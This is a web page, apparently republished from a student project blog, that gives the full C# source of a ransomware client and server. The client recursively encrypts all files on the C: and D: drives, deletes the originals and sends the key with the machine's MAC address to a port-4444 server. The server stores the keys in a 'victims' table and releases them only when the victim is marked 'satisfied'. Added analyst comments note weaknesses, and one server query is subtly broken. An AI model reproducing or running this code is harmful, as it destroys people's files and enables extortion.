[Gukwon高校プロジェクト]ランサムウェア完全コード
GitHub: https://github.com/benkerry/gukwon-ransomware
# Utils.cs
namespace Utils
{
/// <summary>
/// Plain container that pairs a symmetric key with its initialisation vector.
/// On this page it is the return type of Encryptor.EncryptFiles and is read by
/// the client Program to Base64-encode both values before sending them.
/// </summary>
public struct KeySet
{
// Raw key bytes (copied from aes.Key in Encryptor.EncryptFiles).
public byte[] Key;
// Raw IV bytes (copied from aes.IV in Encryptor.EncryptFiles).
public byte[] IV;
}
/// <summary>
/// Helpers that grow an array by allocating a new one and re-pointing the
/// caller's reference at it. The original array instance is never modified.
/// </summary>
public static class ArrayAppender
{
    /// <summary>
    /// Replaces <paramref name="a"/> with a new array holding the elements of
    /// <paramref name="a"/> followed by the elements of <paramref name="b"/>.
    /// </summary>
    /// <param name="a">Array reference to extend; reassigned on return.</param>
    /// <param name="b">Elements to place after the existing ones.</param>
    public static void Append<T>(ref T[] a, T[] b)
    {
        T[] merged = new T[a.Length + b.Length];

        // Existing elements keep their positions; b starts right after them.
        a.CopyTo(merged, 0);
        b.CopyTo(merged, a.Length);

        a = merged;
    }

    /// <summary>
    /// Replaces <paramref name="a"/> with a new array that is one element
    /// longer and ends with <paramref name="b"/>.
    /// </summary>
    /// <param name="a">Array reference to extend; reassigned on return.</param>
    /// <param name="b">Single element stored in the new last slot.</param>
    public static void Append<T>(ref T[] a, T b)
    {
        int oldLength = a.Length;
        T[] grown = new T[oldLength + 1];

        a.CopyTo(grown, 0);
        grown[oldLength] = b;

        a = grown;
    }
}
/// <summary>
/// Integer codes exchanged on the client/server TCP channel shown on this page.
/// Each one is written with BinaryWriter.Write(int), i.e. as a 4-byte value.
/// The fields are mutable statics (neither const nor readonly).
/// </summary>
public static class CONSTANTS
{
// Written by the server when its lookup returns no rows.
public static int FAIL = 0x00;
// Written by the server immediately before the stored key and IV strings.
public static int SUCCESS = 0x01;
// Written by the client as the first field of the message that carries the key and IV.
public static int SEND_KEY = 0x02;
// Written by the client's timer callback as the first field of its periodic request.
public static int DECRYPT_REQ = 0x03;
}
}
ArrayAppender 静的クラスは、2つの配列を連結します。
# (Client) FilePathGetter.cs
using System.IO;
using Utils;
namespace gukwon_ransomeware_client
{
/// <summary>
/// Builds a flat list of file paths by walking directory trees recursively.
/// Analyst note: this is the target-selection stage of the sample. The only
/// exclusion visible here is a path that contains the text "SYSTEM"; there is
/// no filter on file extension or size.
/// </summary>
public class FilePathGetter
{
// Accumulated result. It is initialised once in the constructor and is not
// cleared between calls, so later calls return earlier results as well.
private string[] allFilePathes;
/// <summary>Starts with an empty result list.</summary>
public FilePathGetter()
{
allFilePathes = new string[0];
}
/// <summary>
/// Walks every existing directory in <paramref name="dirPathes"/> and returns
/// the accumulated list of file paths.
/// </summary>
/// <param name="dirPathes">Root directories to walk; entries that do not exist are skipped.</param>
/// <returns>The internal accumulator array itself (not a copy).</returns>
public string[] GetAllFilePathes(string[] dirPathes)
{
for (int i = 0; i < dirPathes.Length; i++)
{
if(Directory.Exists(dirPathes[i]))
GetAllFilePathes(new DirectoryInfo(dirPathes[i]));
}
return allFilePathes;
}
/// <summary>
/// Adds the files directly inside <paramref name="dirInfo"/> to the accumulator,
/// then recurses into each sub-directory.
/// </summary>
private void GetAllFilePathes(DirectoryInfo dirInfo)
{
// Both listings are requested before the exclusion check below runs.
FileInfo[] files = dirInfo.GetFiles();
DirectoryInfo[] dirs = dirInfo.GetDirectories();
string[] pathes = new string[files.Length];
// Case-insensitive substring test on the full path: any directory whose path
// contains "SYSTEM" is skipped together with everything beneath it.
if (dirInfo.FullName.ToUpper().Contains("SYSTEM"))
return;
for (int i = 0; i < files.Length; i++)
{
pathes[i] = files[i].FullName;
}
ArrayAppender.Append(ref allFilePathes, pathes);
for(int i = 0; i < dirs.Length; i++)
{
GetAllFilePathes(dirs[i]);
}
}
}
}
# (Client) Encryptor.cs
using System.IO;
using System.Security.Cryptography;
namespace gukwon_ransomeware_client
{
/// <summary>
/// Encrypts a list of files with one symmetric key and IV generated per instance.
/// For each input it writes "&lt;path&gt;.encrypted" and then deletes the original.
/// Analyst note: the on-disk artefacts are the ".encrypted" suffix and a burst of
/// create-then-delete operations across the enumerated paths. Because the key
/// and IV are generated once in the constructor and reused for every file, one
/// recovered key/IV pair covers everything this instance processed.
/// </summary>
public class Encryptor
{
private RijndaelManaged aes;
// Not assigned anywhere in this class; EncryptFiles declares a local variable
// with the same name and returns that instead.
public Utils.KeySet keySet;
/// <summary>
/// Configures Rijndael with a 256-bit key, 128-bit block, CBC mode and PKCS7
/// padding, then generates a fresh key and IV.
/// </summary>
public Encryptor()
{
aes = new RijndaelManaged();
aes.KeySize = 256;
aes.BlockSize = 128;
aes.Padding = PaddingMode.PKCS7;
aes.Mode = CipherMode.CBC;
aes.GenerateKey();
aes.GenerateIV();
}
/// <summary>
/// Processes every path that exists as a file and returns the key and IV in use.
/// </summary>
/// <param name="pathes">File paths to process; entries that are not existing files are skipped.</param>
/// <returns>A KeySet holding aes.Key and aes.IV.</returns>
public Utils.KeySet EncryptFiles(string[] pathes)
{
int count;
// 128-bit block => the files are copied through a 16-byte buffer.
int blockSizeBytes = aes.BlockSize / 8;
byte[] data = new byte[blockSizeBytes];
Utils.KeySet keySet;
FileStream inFs;
FileStream outFs;
CryptoStream cryptoStream;
for (int i = 0; i < pathes.Length; i++)
{
if (File.Exists(pathes[i]))
{
inFs = new FileStream(pathes[i], FileMode.Open);
outFs = new FileStream(pathes[i] + ".encrypted", FileMode.Create);
// A new transform is created per file from the same aes object, so each file
// is encrypted under the same key and IV.
cryptoStream = new CryptoStream(outFs, aes.CreateEncryptor(), CryptoStreamMode.Write);
do
{
count = inFs.Read(data, 0, blockSizeBytes);
cryptoStream.Write(data, 0, count);
}
while (count > 0);
inFs.Close();
cryptoStream.FlushFinalBlock();
cryptoStream.Close();
outFs.Close();
// The original is removed with File.Delete; this code does not overwrite its
// contents first. NOTE(review): whether the deleted data stays recoverable
// depends on the file system and later disk activity.
File.Delete(pathes[i]);
}
}
keySet.Key = aes.Key;
keySet.IV = aes.IV;
return keySet;
}
}
}
# (Client) Decryptor.cs
using System.IO;
using System.Security.Cryptography;
namespace gukwon_ransomeware_client
{
/// <summary>
/// Counterpart of Encryptor: given a key and IV, turns "&lt;path&gt;.encrypted" back
/// into "&lt;path&gt;" and deletes the ".encrypted" file.
/// Analyst note: the cipher parameters are fixed here (256-bit key, 128-bit
/// block, CBC, PKCS7), so a recovered key/IV pair plus these settings is all
/// this class needs to restore a file.
/// </summary>
public class Decryptor
{
private RijndaelManaged aes;
/// <summary>
/// Configures Rijndael with the same parameters as Encryptor and installs the
/// supplied key and IV.
/// </summary>
/// <param name="Key">Raw key bytes.</param>
/// <param name="IV">Raw IV bytes.</param>
public Decryptor(byte[] Key, byte[] IV)
{
aes = new RijndaelManaged();
aes.KeySize = 256;
aes.BlockSize = 128;
aes.Padding = PaddingMode.PKCS7;
aes.Mode = CipherMode.CBC;
aes.Key = Key;
aes.IV = IV;
}
/// <summary>
/// For each entry, processes "&lt;entry&gt;.encrypted" if that file exists.
/// </summary>
/// <param name="pathes">Original (pre-encryption) file paths, without the ".encrypted" suffix.</param>
public void DecryptFiles(string[] pathes)
{
int count;
// 128-bit block => the files are copied through a 16-byte buffer.
int blockSizeBytes = aes.BlockSize / 8;
byte[] data = new byte[blockSizeBytes];
FileStream inFs;
FileStream outFs;
CryptoStream cryptoStream;
for (int i = 0; i < pathes.Length; i++)
{
if (File.Exists(pathes[i] + ".encrypted"))
{
inFs = new FileStream(pathes[i] + ".encrypted", FileMode.Open);
// FileMode.Create: a file already present at the original path is overwritten.
outFs = new FileStream(pathes[i], FileMode.Create);
cryptoStream = new CryptoStream(outFs, aes.CreateDecryptor(), CryptoStreamMode.Write);
do
{
count = inFs.Read(data, 0, blockSizeBytes);
cryptoStream.Write(data, 0, count);
}
while (count > 0);
inFs.Close();
cryptoStream.FlushFinalBlock();
cryptoStream.Close();
outFs.Close();
File.Delete(pathes[i] + ".encrypted");
}
}
}
}
}
# (Client) Program.cs
using System;
using System.IO;
using System.Timers;
using System.Net.Sockets;
using System.Net.NetworkInformation;
using Utils;
namespace gukwon_ransomeware_client
{
/// <summary>
/// Client entry point of the sample.
/// Analyst summary of the behaviour visible in this class:
///  - host artefacts: a "data.dat" file in the working directory holding the list
///    of affected paths, plus the ".encrypted" files produced by Encryptor;
///  - network artefacts: outbound TCP to port 4444 (the host is "localhost" in
///    this listing), once after encryption and then from a 5-minute timer;
///  - the key and IV are sent Base64-encoded over that plain TCP connection with
///    no transport encryption in this code, so a capture of the exchange
///    contains the material needed for recovery;
///  - the first network interface's MAC address is used as the host identifier.
/// </summary>
class Program
{
// Paths handled by this run; loaded from data.dat or built by enumeration in Main.
static string[] pathes = new string[0];
/// <summary>
/// Timer callback: sends DECRYPT_REQ and the MAC address, reads an Int32 reply
/// and, for the 0x00 case, reads two strings that are Base64-decoded and handed
/// to Decryptor.
/// </summary>
static void Elapsed(object src, ElapsedEventArgs e)
{
string base64_key = null, base64_iv = null;
TcpClient client = new TcpClient("localhost", 4444);
NetworkStream stream = client.GetStream();
BinaryWriter wtr = new BinaryWriter(stream);
BinaryReader rdr = new BinaryReader(stream);
Decryptor decryptor;
wtr.Write(CONSTANTS.DECRYPT_REQ);
// Host identifier: physical address of the first interface returned by the OS.
wtr.Write(NetworkInterface.GetAllNetworkInterfaces()[0].GetPhysicalAddress().ToString());
wtr.Close();
// The reply code is matched against literal values, not the CONSTANTS fields.
switch (rdr.ReadInt32())
{
case 0x00:
base64_key = rdr.ReadString();
base64_iv = rdr.ReadString();
break;
case 0x01:
rdr.Close();
wtr.Close();
stream.Close();
client.Close();
return;
}
decryptor = new Decryptor(Convert.FromBase64String(base64_key), Convert.FromBase64String(base64_iv));
decryptor.DecryptFiles(pathes);
rdr.Close();
wtr.Close();
stream.Close();
client.Close();
}
/// <summary>
/// If data.dat exists, reloads the stored path list; otherwise enumerates C:\ and
/// D:\, runs Encryptor over the result, records the paths in data.dat and sends
/// the key material to the server. In both cases the 5-minute timer is started.
/// </summary>
static void Main()
{
// 1000 * 60 * 5 ms = 5 minutes between Elapsed callbacks.
Timer timer = new Timer(1000 * 60 * 5);
// Console text is Korean; roughly: "Files may be damaged if the program is
// closed while it is running".
Console.WriteLine("실행 중 종료시 파일들이 손상될 수 있습니다. . .");
// data.dat acts as the "already ran" marker: its presence skips enumeration
// and encryption. Format: Int32 count followed by that many length-prefixed
// strings (BinaryWriter/BinaryReader encoding).
if (File.Exists("data.dat"))
{
BinaryReader rdr = new BinaryReader(new FileStream("data.dat", FileMode.Open));
pathes = new string[rdr.ReadInt32()];
for (int i = 0; i < pathes.Length; i++)
{
pathes[i] = rdr.ReadString();
}
rdr.Close();
}
else
{
KeySet keySet;
string macaddr, base64_key, base64_iv;
BinaryWriter wtr;
FilePathGetter pathGetter = new FilePathGetter();
Encryptor encryptor = new Encryptor();
TcpClient client;
NetworkStream stream;
// Scope is the whole of C:\ and D:\ minus what FilePathGetter excludes.
if (Directory.Exists("C:\\"))
{
pathes = pathGetter.GetAllFilePathes(new string[1] { "C:\\" });
}
if (Directory.Exists("D:\\"))
{
ArrayAppender.Append(ref pathes, pathGetter.GetAllFilePathes(new string[1] { "D:\\" }));
}
keySet = encryptor.EncryptFiles(pathes);
// The path list is written to disk only after EncryptFiles has returned.
wtr = new BinaryWriter(new FileStream("data.dat", FileMode.Create));
wtr.Write(pathes.Length);
for (int i = 0; i < pathes.Length; i++)
{
wtr.Write(pathes[i]);
}
wtr.Close();
macaddr = NetworkInterface.GetAllNetworkInterfaces()[0].GetPhysicalAddress().ToString();
base64_key = Convert.ToBase64String(keySet.Key);
base64_iv = Convert.ToBase64String(keySet.IV);
// Message layout on the wire: Int32 SEND_KEY, then MAC, key and IV as
// length-prefixed strings. Nothing in this block stores the key locally.
client = new TcpClient("localhost", 4444);
stream = client.GetStream();
wtr = new BinaryWriter(stream);
wtr.Write(CONSTANTS.SEND_KEY);
wtr.Write(macaddr);
wtr.Write(base64_key);
wtr.Write(base64_iv);
wtr.Close();
stream.Close();
client.Close();
}
timer.Elapsed += Elapsed;
timer.Start();
}
}
}
# (Server) Program.cs
using System.IO;
using System.Net;
using System.Net.Sockets;
using Utils;
using MySql.Data.MySqlClient;
namespace gukwon_ransomware_server
{
/// <summary>
/// Server side of the sample: a single-threaded TCP listener on port 4444 that
/// stores key material per MAC address in MySQL and answers later lookups.
/// Analyst summary of what this class shows:
///  - it listens on every local address (IPAddress.Any), port 4444;
///  - it targets database "gukwon_ransomware", table "victims", with the columns
///    named in the SQL text below, and reads a "satisfied" flag;
///  - the database credentials are hard-coded in the connection string;
///  - the SQL text is assembled with string.Format from values read off the
///    network rather than through command parameters.
/// </summary>
class Program
{
/// <summary>
/// Accepts clients one at a time in an endless loop; each connection carries one
/// request (Int32 mode followed by the MAC address string).
/// </summary>
static void Main()
{
int mode;
string macaddr, base64_key, base64_iv;
TcpListener server = new TcpListener(IPAddress.Any, 4444);
TcpClient client;
NetworkStream netStream;
BinaryReader rdr;
BinaryWriter wtr;
MySqlConnection conn;
MySqlCommand cmd;
MySqlDataReader sqlrdr;
server.Start();
while (true)
{
// Blocks until a client connects; there is no concurrency in this loop.
client = server.AcceptTcpClient();
// A new database connection is opened for every accepted client.
conn = new MySqlConnection("Server=localhost;Database=gukwon_ransomware;Uid=root;Pwd=test;");
conn.Open();
netStream = client.GetStream();
rdr = new BinaryReader(netStream);
mode = rdr.ReadInt32();
macaddr = rdr.ReadString();
// Any mode other than SEND_KEY falls through to the lookup branch.
if (mode == CONSTANTS.SEND_KEY)
{
base64_key = rdr.ReadString();
base64_iv = rdr.ReadString();
// Builds the INSERT text for table "victims" from the three received strings.
cmd = new MySqlCommand(string.Format("INSERT INTO victims(mac_addr, keystring, ivstring) VALUES(\"{0}\", \"{1}\", \"{2}\";", macaddr, base64_key, base64_iv));
cmd.ExecuteNonQuery();
conn.Close();
cmd.Dispose();
rdr.Close();
netStream.Close();
client.Close();
}
else
{
// Builds the lookup text: key and IV columns for rows where satisfied = 1.
cmd = new MySqlCommand(string.Format("SELECT keystring, ivstring FROM victims WHERE macaddr=\"{0}\" AND satisfied = 1"));
sqlrdr = cmd.ExecuteReader();
if (sqlrdr.HasRows)
{
rdr.Close();
sqlrdr.Read();
// Reply layout: Int32 SUCCESS, then the stored key and IV strings.
wtr = new BinaryWriter(netStream);
wtr.Write(CONSTANTS.SUCCESS);
wtr.Write(sqlrdr["keystring"].ToString());
wtr.Write(sqlrdr["ivstring"].ToString());
wtr.Close();
conn.Close();
cmd.Dispose();
netStream.Close();
client.Close();
}
else
{
// Reply layout when no row matches: Int32 FAIL only.
wtr = new BinaryWriter(netStream);
wtr.Write(CONSTANTS.FAIL);
wtr.Close();
conn.Close();
cmd.Dispose();
rdr.Close();
netStream.Close();
client.Close();
}
}
}
}
}
}
Reference
この件([Gukwon高校プロジェクト]ランサムウェア完全コード)の詳細は、次のページにあります: https://velog.io/@developerkerry/국원고-프로젝트-랜섬웨어-전체-코드
テキストは自由に共有またはコピーできます。ただし、このドキュメントのURLは参考URLとして残しておいてください。
Collection and Share based on the CC Protocol